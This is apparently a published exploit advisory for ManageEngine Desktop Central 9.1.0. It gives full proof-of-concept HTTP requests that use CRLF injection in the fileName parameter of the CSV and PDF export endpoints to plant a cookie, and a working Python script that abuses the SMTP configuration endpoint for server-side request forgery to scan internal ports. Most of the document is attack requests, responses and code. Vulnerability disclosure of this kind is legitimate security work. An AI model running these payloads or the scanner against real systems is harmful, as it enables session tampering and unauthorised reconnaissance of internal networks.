Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-02-14# Software Link : http://www.desktopcentral.com# Tested Version: 9.1.0 (Build No: 91084)# Tested on:  Windows 10# Vulnerability Type: CRLF injection (CRLF) - 1CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.csv.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostResponse:HTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csvX-dc-header: yesContent-Length: 95Keep-Alive: timeout=5, max=20Connection: Keep-AliveContent-Type: text/csv;charset=UTF-8# Vulnerability Type: CRLF injection (CRLF) - 2CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostHTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013X-dc-header: yesContent-Length: 4470Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/pdf;charset=UTF-8# Vulnerability Type: Server-Side Request Forgery (SSRF)CVSS v3: 8.0CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:HCWE: CWE-918 Server-Side Request Forgery (SSRF)Vulnerability description: Server-Side Request Forgery (SSRF) vulnerabilityin ManageEngine Desktop Central 9.1.0 allows an attacker can force avulnerable server to trigger malicious requests to third-party servers orto internal resources. This vulnerability allows authenticated attackerwith network access via HTTP and can then be leveraged to launch specificattacks such as a cross-site port attack, service enumeration, and variousother attacks.Proof of concept:Save this content in a python file (ex. ssrf_manageenginedesktop9.py),change the variable sitevuln value with ip address:import argparsefrom termcolor import coloredimport requestsimport urllib3import datetimeurllib3.disable_warnings()print(colored('''------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------''',"red"))def smtpConfig_ssrf(target,port,d):    now1 = datetime.datetime.now()    text = ''    sitevuln = 'localhost'    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;JSESSIONID=D10A9C62D985A0966647099E14C622F8;DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'    try:        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie':        cookie,'Connection': 'keep-alive'},verify=False, timeout=10)        text = response.text        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if ('updateRefMsgCookie' in text):            return colored('Cookie lost',"yellow")        if d == "0":            print ('Time response: ' + str(rest) + '\n' + text + '\n')        if (seconds > 5.0):            return colored('open',"green")        else:            return colored('closed',"red")    except:        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if (seconds > 10.0):            return colored('open',"green")        else:            return colored('closed',"red")    return colored('unknown',"yellow")if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -SSRF Open ports",required=True)    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9- SSRF Open ports",required=True)    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central9 - SSRF Open ports (0 print or 1 no print)",required=False)    args = parser.parse_args()    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')And:$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:8080 open$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:7777 closed